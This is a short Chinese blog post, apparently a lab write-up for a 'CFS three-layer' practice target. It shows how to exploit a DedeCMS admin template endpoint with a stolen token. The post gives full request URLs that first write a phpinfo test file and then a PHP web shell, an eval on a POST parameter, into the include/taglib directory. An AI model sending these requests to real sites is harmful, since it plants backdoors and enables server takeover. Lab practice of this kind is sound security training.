侧边栏壁纸
博主头像
Tess-Wiki 博主等级

世间万般兵刃,唯有过往伤人最深。

  • 累计撰写 200 篇文章
  • 累计创建 1 个标签
  • 累计收到 46 条评论

目 录CONTENT

文章目录
Vlunhub

新:CFS三层靶机

Administrator
Administrator
2023-09-26 / 0 评论 / 0 点赞 / 14 阅读 / 0 字

http://ip:xx7端口

先登录后台

再访问http://xxxxxxxx:xx7/dede/tpl.php?action=upload

使用插件EditThisCookie2

看一下cookie,这里的cookie就是token

d2b5ca33bd184103

POC1

http://xxxxxxxx:xx7/dede/tpl.php?action=savetagfile&token=2oas45oamvhr57b2pbcl6pkvg0&filename=abc.lib.php&content=<?php phpinfo();?>

d2b5ca33bd184202

成功写入

根据代码可以看到写入到taglib目录,浏览器访问http://xxxxxxxx:xx7/include/taglib/abc.lib.php

d2b5ca33bd184325

http://xxxxxxxx:xx7/dede/tpl.php?action=savetagfile&token=2oas45oamvhr57b2pbcl6pkvg0&filename=aaa.lib.php&content=<?php eval($_POST["aaa"]);?>

d2b5ca33bd184747

-.-

0
版权归属: Administrator
本文链接: https://tess.ink/archives/%E6%96%B0%EF%BC%9ACFS%E4%B8%89%E5%B1%82%E9%9D%B6%E6%9C%BA
许可协议: 本文使用《署名-非商业性使用-相同方式共享 4.0 国际 (CC BY-NC-SA 4.0)》协议授权

评论区